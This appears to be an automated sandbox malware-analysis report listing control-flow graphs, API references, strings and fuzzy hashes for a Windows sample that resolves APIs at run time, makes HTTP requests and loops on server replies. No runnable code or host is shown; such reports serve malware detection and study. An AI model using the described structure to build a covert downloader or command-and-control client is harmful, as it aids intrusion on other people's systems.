                                                            control_flow_graph 633 749c10-749c1a 634 74a036-74a0ca LoadLibraryA * 8 633->634 635 749c20-74a031 GetProcAddress * 43 633->635 636 74a146-74a14d 634->636 637 74a0cc-74a141 GetProcAddress * 5 634->637 635->634 638 74a216-74a21d 636->638 639 74a153-74a211 GetProcAddress * 8 636->639 637->636 640 74a21f-74a293 GetProcAddress * 5 638->640 641 74a298-74a29f 638->641 639->638 640->641 642 74a2a5-74a332 GetProcAddress * 6 641->642 643 74a337-74a33e 641->643 642->643 644 74a344-74a41a GetProcAddress * 9 643->644 645 74a41f-74a426 643->645 644->645 646 74a4a2-74a4a9 645->646 647 74a428-74a49d GetProcAddress * 5 645->647 648 74a4dc-74a4e3 646->648 649 74a4ab-74a4d7 GetProcAddress * 2 646->649 647->646 650 74a515-74a51c 648->650 651 74a4e5-74a510 GetProcAddress * 2 648->651 649->648 652 74a612-74a619 650->652 653 74a522-74a60d GetProcAddress * 10 650->653 651->650 654 74a67d-74a684 652->654 655 74a61b-74a678 GetProcAddress * 4 652->655 653->652 656 74a686-74a699 GetProcAddress 654->656 657 74a69e-74a6a5 654->657 655->654 656->657 658 74a6a7-74a703 GetProcAddress * 4 657->658 659 74a708-74a709 657->659 658->659
                                                            APIs
                                                            • GetProcAddress.KERNEL32(76210000,00FCA668), ref: 00749C2D
                                                            • GetProcAddress.KERNEL32(76210000,00FCA768), ref: 00749C45
                                                            • GetProcAddress.KERNEL32(76210000,00FC3B70), ref: 00749C5E
                                                            • GetProcAddress.KERNEL32(76210000,00FC3B88), ref: 00749C76
                                                            • GetProcAddress.KERNEL32(76210000,00FC3BA0), ref: 00749C8E
                                                            • GetProcAddress.KERNEL32(76210000,00FC3BE8), ref: 00749CA7
                                                            • GetProcAddress.KERNEL32(76210000,00FCB9E8), ref: 00749CBF
                                                            • GetProcAddress.KERNEL32(76210000,00FC3E70), ref: 00749CD7
                                                            • GetProcAddress.KERNEL32(76210000,00FC3E40), ref: 00749CF0
                                                            • GetProcAddress.KERNEL32(76210000,00FC3E88), ref: 00749D08
                                                            • GetProcAddress.KERNEL32(76210000,00FC3EB8), ref: 00749D20
                                                            • GetProcAddress.KERNEL32(76210000,00FCA868), ref: 00749D39
                                                            • GetProcAddress.KERNEL32(76210000,00FCA6A8), ref: 00749D51
                                                            • GetProcAddress.KERNEL32(76210000,00FCA948), ref: 00749D69
                                                            • GetProcAddress.KERNEL32(76210000,00FCA6C8), ref: 00749D82
                                                            • GetProcAddress.KERNEL32(76210000,00FC3E58), ref: 00749D9A
                                                            • GetProcAddress.KERNEL32(76210000,00FC3E10), ref: 00749DB2
                                                            • GetProcAddress.KERNEL32(76210000,00FCB718), ref: 00749DCB
                                                            • GetProcAddress.KERNEL32(76210000,00FCA8C8), ref: 00749DE3
                                                            • GetProcAddress.KERNEL32(76210000,00FC3ED0), ref: 00749DFB
                                                            • GetProcAddress.KERNEL32(76210000,00FC3EA0), ref: 00749E14
                                                            • GetProcAddress.KERNEL32(76210000,00FC3E28), ref: 00749E2C
                                                            • GetProcAddress.KERNEL32(76210000,00FCFA00), ref: 00749E44
                                                            • GetProcAddress.KERNEL32(76210000,00FCA908), ref: 00749E5D
                                                            • GetProcAddress.KERNEL32(76210000,00FCFB38), ref: 00749E75
                                                            • GetProcAddress.KERNEL32(76210000,00FCFAC0), ref: 00749E8D
                                                            • GetProcAddress.KERNEL32(76210000,00FCFC28), ref: 00749EA6
                                                            • GetProcAddress.KERNEL32(76210000,00FCFC58), ref: 00749EBE
                                                            • GetProcAddress.KERNEL32(76210000,00FCFC10), ref: 00749ED6
                                                            • GetProcAddress.KERNEL32(76210000,00FCFB50), ref: 00749EEF
                                                            • GetProcAddress.KERNEL32(76210000,00FCFB80), ref: 00749F07
                                                            • GetProcAddress.KERNEL32(76210000,00FCFB08), ref: 00749F1F
                                                            • GetProcAddress.KERNEL32(76210000,00FCFC88), ref: 00749F38
                                                            • GetProcAddress.KERNEL32(76210000,00FC4540), ref: 00749F50
                                                            • GetProcAddress.KERNEL32(76210000,00FCFB98), ref: 00749F68
                                                            • GetProcAddress.KERNEL32(76210000,00FCFB20), ref: 00749F81
                                                            • GetProcAddress.KERNEL32(76210000,00FCA708), ref: 00749F99
                                                            • GetProcAddress.KERNEL32(76210000,00FCFA18), ref: 00749FB1
                                                            • GetProcAddress.KERNEL32(76210000,00FCA788), ref: 00749FCA
                                                            • GetProcAddress.KERNEL32(76210000,00FCFC40), ref: 00749FE2
                                                            • GetProcAddress.KERNEL32(76210000,00FCFA30), ref: 00749FFA
                                                            • GetProcAddress.KERNEL32(76210000,00FCA7C8), ref: 0074A013
                                                            • GetProcAddress.KERNEL32(76210000,00FCA808), ref: 0074A02B
                                                            • LoadLibraryA.KERNEL32(00FCFA78,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A03D
                                                            • LoadLibraryA.KERNEL32(00FCF9A0,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A04E
                                                            • LoadLibraryA.KERNEL32(00FCFAA8,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A060
                                                            • LoadLibraryA.KERNEL32(00FCFAD8,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A072
                                                            • LoadLibraryA.KERNEL32(00FCFA48,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A083
                                                            • LoadLibraryA.KERNEL32(00FCFA60,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A095
                                                            • LoadLibraryA.KERNEL32(00FCF9B8,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A0A7
                                                            • LoadLibraryA.KERNEL32(00FCFA90,?,00745CA3,?,00000034,00000064,00746600,?,0000002C,00000064,007465A0,?,00000030,00000064,Function_00015AD0,?), ref: 0074A0B8
                                                            • GetProcAddress.KERNEL32(751E0000,00FCA2C8), ref: 0074A0DA
                                                            • GetProcAddress.KERNEL32(751E0000,00FCFAF0), ref: 0074A0F2
                                                            • GetProcAddress.KERNEL32(751E0000,00FCD580), ref: 0074A10A
                                                            • GetProcAddress.KERNEL32(751E0000,00FCFBB0), ref: 0074A123
                                                            • GetProcAddress.KERNEL32(751E0000,00FCA4C8), ref: 0074A13B
                                                            • GetProcAddress.KERNEL32(700F0000,00FCB768), ref: 0074A160
                                                            • GetProcAddress.KERNEL32(700F0000,00FCA4A8), ref: 0074A179
                                                            • GetProcAddress.KERNEL32(700F0000,00FCB790), ref: 0074A191
                                                            • GetProcAddress.KERNEL32(700F0000,00FCFC70), ref: 0074A1A9
                                                            • GetProcAddress.KERNEL32(700F0000,00FCFB68), ref: 0074A1C2
                                                            • GetProcAddress.KERNEL32(700F0000,00FCA488), ref: 0074A1DA
                                                            • GetProcAddress.KERNEL32(700F0000,00FCA428), ref: 0074A1F2
                                                            • GetProcAddress.KERNEL32(700F0000,00FCFBC8), ref: 0074A20B
                                                            • GetProcAddress.KERNEL32(753A0000,00FCA5A8), ref: 0074A22C
                                                            • GetProcAddress.KERNEL32(753A0000,00FCA4E8), ref: 0074A244
                                                            • GetProcAddress.KERNEL32(753A0000,00FCFBE0), ref: 0074A25D
                                                            • GetProcAddress.KERNEL32(753A0000,00FCFBF8), ref: 0074A275
                                                            • GetProcAddress.KERNEL32(753A0000,00FCA448), ref: 0074A28D
                                                            • GetProcAddress.KERNEL32(76310000,00FCB858), ref: 0074A2B3
                                                            • GetProcAddress.KERNEL32(76310000,00FCB7B8), ref: 0074A2CB
                                                            • GetProcAddress.KERNEL32(76310000,00FCF9D0), ref: 0074A2E3
                                                            • GetProcAddress.KERNEL32(76310000,00FCA508), ref: 0074A2FC
                                                            • GetProcAddress.KERNEL32(76310000,00FCA348), ref: 0074A314
                                                            • GetProcAddress.KERNEL32(76310000,00FCB808), ref: 0074A32C
                                                            • GetProcAddress.KERNEL32(76910000,00FCF9E8), ref: 0074A352
                                                            • GetProcAddress.KERNEL32(76910000,00FCA5C8), ref: 0074A36A
                                                            • GetProcAddress.KERNEL32(76910000,00FCD620), ref: 0074A382
                                                            • GetProcAddress.KERNEL32(76910000,00FCFCD0), ref: 0074A39B
                                                            • GetProcAddress.KERNEL32(76910000,00FCFCB8), ref: 0074A3B3
                                                            • GetProcAddress.KERNEL32(76910000,00FCA3A8), ref: 0074A3CB
                                                            • GetProcAddress.KERNEL32(76910000,00FCA468), ref: 0074A3E4
                                                            • GetProcAddress.KERNEL32(76910000,00FCFCE8), ref: 0074A3FC
                                                            • GetProcAddress.KERNEL32(76910000,00FCFD00), ref: 0074A414
                                                            • GetProcAddress.KERNEL32(75B30000,00FCA408), ref: 0074A436
                                                            • GetProcAddress.KERNEL32(75B30000,00FCFD18), ref: 0074A44E
                                                            • GetProcAddress.KERNEL32(75B30000,00FCFD30), ref: 0074A466
                                                            • GetProcAddress.KERNEL32(75B30000,00FCFD48), ref: 0074A47F
                                                            • GetProcAddress.KERNEL32(75B30000,00FCFCA0), ref: 0074A497
                                                            • GetProcAddress.KERNEL32(75670000,00FCA368), ref: 0074A4B8
                                                            • GetProcAddress.KERNEL32(75670000,00FCA628), ref: 0074A4D1
                                                            • GetProcAddress.KERNEL32(76AC0000,00FCA268), ref: 0074A4F2
                                                            • GetProcAddress.KERNEL32(76AC0000,00FCFD60), ref: 0074A50A
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FCA528), ref: 0074A530
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FCA288), ref: 0074A548
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FCA5E8), ref: 0074A560
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FD02D0), ref: 0074A579
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FCA548), ref: 0074A591
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FCA568), ref: 0074A5A9
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FCA2E8), ref: 0074A5C2
                                                            • GetProcAddress.KERNEL32(6F4E0000,00FCA308), ref: 0074A5DA
                                                            • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0074A5F1
                                                            • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0074A607
                                                            • GetProcAddress.KERNEL32(75AE0000,00FD0150), ref: 0074A629
                                                            • GetProcAddress.KERNEL32(75AE0000,00FCD640), ref: 0074A641
                                                            • GetProcAddress.KERNEL32(75AE0000,00FD0240), ref: 0074A659
                                                            • GetProcAddress.KERNEL32(75AE0000,00FD0108), ref: 0074A672
                                                            • GetProcAddress.KERNEL32(76300000,00FCA388), ref: 0074A693
                                                            • GetProcAddress.KERNEL32(6E820000,00FD0198), ref: 0074A6B4
                                                            • GetProcAddress.KERNEL32(6E820000,00FCA588), ref: 0074A6CD
                                                            • GetProcAddress.KERNEL32(6E820000,00FD01C8), ref: 0074A6E5
                                                            • GetProcAddress.KERNEL32(6E820000,00FD0288), ref: 0074A6FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: HttpQueryInfoA$InternetSetOptionA$P2#v$1#v
                                                            • API String ID: 2238633743-3014924196
                                                            • Opcode ID: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
                                                            • Instruction ID: dd93013a2c9dee22fa6d5496fada8367318fc83867a585dff32fd54f26967be4
                                                            • Opcode Fuzzy Hash: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
                                                            • Instruction Fuzzy Hash: 10622DB792C200AFC348DFA8ED8999E37F9F7CC601B14451AA61DC3264D63994C1EB53

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1001 736280-73630b call 74a7a0 call 7347b0 call 74a740 InternetOpenA StrCmpCA 1008 736314-736318 1001->1008 1009 73630d 1001->1009 1010 736509-736525 call 74a7a0 call 74a800 * 2 1008->1010 1011 73631e-736342 InternetConnectA 1008->1011 1009->1008 1029 736528-73652d 1010->1029 1012 736348-73634c 1011->1012 1013 7364ff-736503 InternetCloseHandle 1011->1013 1015 73635a 1012->1015 1016 73634e-736358 1012->1016 1013->1010 1018 736364-736392 HttpOpenRequestA 1015->1018 1016->1018 1020 7364f5-7364f9 InternetCloseHandle 1018->1020 1021 736398-73639c 1018->1021 1020->1013 1024 7363c5-736405 HttpSendRequestA HttpQueryInfoA 1021->1024 1025 73639e-7363bf InternetSetOptionA 1021->1025 1027 736407-736427 call 74a740 call 74a800 * 2 1024->1027 1028 73642c-73644b call 748940 1024->1028 1025->1024 1027->1029 1034 7364c9-7364e9 call 74a740 call 74a800 * 2 1028->1034 1035 73644d-736454 1028->1035 1034->1029 1038 7364c7-7364ef InternetCloseHandle 1035->1038 1039 736456-736480 InternetReadFile 1035->1039 1038->1020 1044 736482-736489 1039->1044 1045 73648b 1039->1045 1044->1045 1048 73648d-7364c5 call 74a9b0 call 74a8a0 call 74a800 1044->1048 1045->1038 1048->1039
                                                            APIs
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
                                                              • Part of subcall function 007347B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
                                                              • Part of subcall function 007347B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                                                              • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                                                            • StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736303
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00736385
                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007363FD
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0073646D
                                                            • InternetCloseHandle.WININET(00000000), ref: 007364EF
                                                            • InternetCloseHandle.WININET(00000000), ref: 007364F9
                                                            • InternetCloseHandle.WININET(00000000), ref: 00736503
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                            • String ID: ERROR$ERROR$GET
                                                            • API String ID: 3074848878-2509457195
                                                            • Opcode ID: 479529121835fa872f99367033dfe5e1277dd004f1102bb36dd170b9826fdda8
                                                            • Instruction ID: 457cc17c6f8fdcafd44b5d1a77931676667fbf6758abb1eb4c519170c449d6e8
                                                            • Opcode Fuzzy Hash: 479529121835fa872f99367033dfe5e1277dd004f1102bb36dd170b9826fdda8
                                                            • Instruction Fuzzy Hash: 25717F71A50218FBEB24DFA0CC49BEE77B8FB44701F108198F5096B191DBB86A85CF52

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1058 7417a0-7417cd call 74aad0 StrCmpCA 1061 7417d7-7417f1 call 74aad0 strtok_s 1058->1061 1062 7417cf-7417d1 ExitProcess 1058->1062 1065 7417f4-7417f8 1061->1065 1066 7419c2-7419cd call 74a800 1065->1066 1067 7417fe-741811 1065->1067 1069 741817-74181a 1067->1069 1070 74199e-7419bd strtok_s 1067->1070 1071 741835-741844 call 74a820 1069->1071 1072 741970-741981 StrCmpCA 1069->1072 1073 7418f1-741902 StrCmpCA 1069->1073 1074 741951-741962 StrCmpCA 1069->1074 1075 741932-741943 StrCmpCA 1069->1075 1076 741913-741924 StrCmpCA 1069->1076 1077 74185d-74186e StrCmpCA 1069->1077 1078 74187f-741890 StrCmpCA 1069->1078 1079 741821-741830 call 74a820 1069->1079 1080 7418ad-7418be StrCmpCA 1069->1080 1081 7418cf-7418e0 StrCmpCA 1069->1081 1082 74198f-741999 call 74a820 1069->1082 1083 741849-741858 call 74a820 1069->1083 1070->1065 1071->1070 1098 741983-741986 1072->1098 1099 74198d 1072->1099 1089 741904-741907 1073->1089 1090 74190e 1073->1090 1095 741964-741967 1074->1095 1096 74196e 1074->1096 1093 741945-741948 1075->1093 1094 74194f 1075->1094 1091 741926-741929 1076->1091 1092 741930 1076->1092 1103 741870-741873 1077->1103 1104 74187a 1077->1104 1105 741892-74189c 1078->1105 1106 74189e-7418a1 1078->1106 1079->1070 1085 7418c0-7418c3 1080->1085 1086 7418ca 1080->1086 1087 7418e2-7418e5 1081->1087 1088 7418ec 1081->1088 1082->1070 1083->1070 1085->1086 1086->1070 1087->1088 1088->1070 1089->1090 1090->1070 1091->1092 1092->1070 1093->1094 1094->1070 1095->1096 1096->1070 1098->1099 1099->1070 1103->1104 1104->1070 1110 7418a8 1105->1110 1106->1110 1110->1070
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessstrtok_s
                                                            • String ID: block
                                                            • API String ID: 3407564107-2199623458
                                                            • Opcode ID: bd5191dfb5bd3664d88507349a8b101d8c0cd9f92a971311c24a28bf9d5dfe3b
                                                            • Instruction ID: 10d40ff498a2f99c1d5a646b3edf2cdb6c4c0b76ba84d1c1afdb9b6fa8695b2a
                                                            • Opcode Fuzzy Hash: bd5191dfb5bd3664d88507349a8b101d8c0cd9f92a971311c24a28bf9d5dfe3b
                                                            • Instruction Fuzzy Hash: D1518AB5B1420AEFDB04EFA1D958AFE77B9BF44304F508048E806A7340D778E981DB62

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1111 745510-745577 call 745ad0 call 74a820 * 3 call 74a740 * 4 1127 74557c-745583 1111->1127 1128 745585-7455d2 call 74a820 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 1127->1128 1129 7455d7-745617 call 74a740 * 2 call 731590 call 7452c0 1127->1129 1155 745693-7456a9 call 74aad0 StrCmpCA 1128->1155 1144 74561c-74564c call 74a8a0 call 74a800 call 74aad0 StrCmpCA 1129->1144 1144->1155 1159 74564e-74568e call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 1144->1159 1160 7457dc-745844 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 call 731550 1155->1160 1161 7456af-7456b6 1155->1161 1159->1155 1290 745ac3-745ac6 1160->1290 1163 7456bc-7456c3 1161->1163 1164 7457da-74585f call 74aad0 StrCmpCA 1161->1164 1167 7456c5-7456fa call 74a820 call 74a7a0 call 731590 call 7451f0 1163->1167 1168 74571e-745793 call 74a740 * 2 call 731590 call 7452c0 call 74a8a0 call 74a800 call 74aad0 StrCmpCA 1163->1168 1183 745865-74586c 1164->1183 1184 745991-7459f9 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 call 731550 1164->1184 1225 7456ff-745719 call 74a8a0 call 74a800 1167->1225 1168->1164 1267 745795-7457d5 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 1168->1267 1189 745872-745879 1183->1189 1190 74598f-745a14 call 74aad0 StrCmpCA 1183->1190 1184->1290 1197 7458d3-745948 call 74a740 * 2 call 731590 call 7452c0 call 74a8a0 call 74a800 call 74aad0 StrCmpCA 1189->1197 1198 74587b-7458ce call 74a820 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 1189->1198 1219 745a16-745a21 Sleep 1190->1219 1220 745a28-745a91 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 call 731550 1190->1220 1197->1190 1295 74594a-74598a call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 1197->1295 1198->1190 1219->1127 1220->1290 1225->1164 1267->1164 1295->1190
                                                            APIs
                                                              • Part of subcall function 0074A820: lstrlenA.KERNEL32(00000000,?,?,00745B54,00750ADB,00750ADA,?,?,00746B16,00000000,?,00FC1558,?,0075110C,?,00000000), ref: 0074A82B
                                                              • Part of subcall function 0074A820: lstrcpy.KERNEL32(u,00000000), ref: 0074A885
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745644
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007456A1
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745857
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 007451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                              • Part of subcall function 007452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
                                                              • Part of subcall function 007452C0: lstrlenA.KERNEL32(00000000), ref: 0074532F
                                                              • Part of subcall function 007452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
                                                              • Part of subcall function 007452C0: lstrlenA.KERNEL32(00000000), ref: 00745383
                                                              • Part of subcall function 007452C0: strtok.MSVCRT(00000000,?), ref: 0074539E
                                                              • Part of subcall function 007452C0: lstrlenA.KERNEL32(00000000), ref: 007453AE
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0074578B
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745940
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745A0C
                                                            • Sleep.KERNEL32(0000EA60), ref: 00745A1B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                            • API String ID: 3630751533-2791005934
                                                            • Opcode ID: 0738c301669ee86c610a830e408c4394f35adb0e7a17460b32dc781d92fb9287
                                                            • Instruction ID: d939a94f27319c01a19431612def871eeaf27ba9c0049f8f656bcd2899b21e5f
                                                            • Opcode Fuzzy Hash: 0738c301669ee86c610a830e408c4394f35adb0e7a17460b32dc781d92fb9287
                                                            • Instruction Fuzzy Hash: 21E11172950104EBEB15FBB0DC9AAED737CAF94300F508528B51666192EF3C6B4DCB92

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                                                              • Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                                                              • Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736303
                                                              • Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                                                              • Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00736385
                                                              • Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                                                              • Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
                                                            • lstrlenA.KERNEL32(00000000), ref: 0074532F
                                                              • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
